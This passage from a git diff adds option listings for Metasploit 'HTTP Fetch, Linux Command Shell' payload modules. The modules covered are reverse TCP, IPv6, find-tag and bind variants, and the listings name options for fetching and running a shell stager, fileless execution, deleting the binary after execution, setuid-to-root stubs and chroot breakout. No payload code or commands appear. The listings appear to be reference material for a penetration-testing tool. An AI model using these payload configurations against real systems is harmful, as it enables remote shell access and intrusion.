Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YbgKKdLnKV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-find_tag.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-find_tag.txt new file mode 100644 index 0000000..fd57d79 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-find_tag.txt @@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Tag Stager + Module: payload/cmd/linux/http/x86/shell/find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QzZYNZBjs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG g3Ix yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..c57ddd5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_ipv6_tcp.txt @@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AyqIvKLrYhI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_nonx_tcp.txt new file mode 100644 index 0000000..3b69c97 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_nonx_tcp.txt @@ -0,0 +1,99 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/shell/reverse_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jISfGhfzdo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..5ae5096 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp.txt @@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DQeueGGNek no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..2beab84 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp_uuid.txt @@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/shell/reverse_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME hCisBzlaR no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..2bf0fb0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_ipv6_tcp.txt @@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/http/x86/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HcneUTaecKE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection over IPv6 and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git 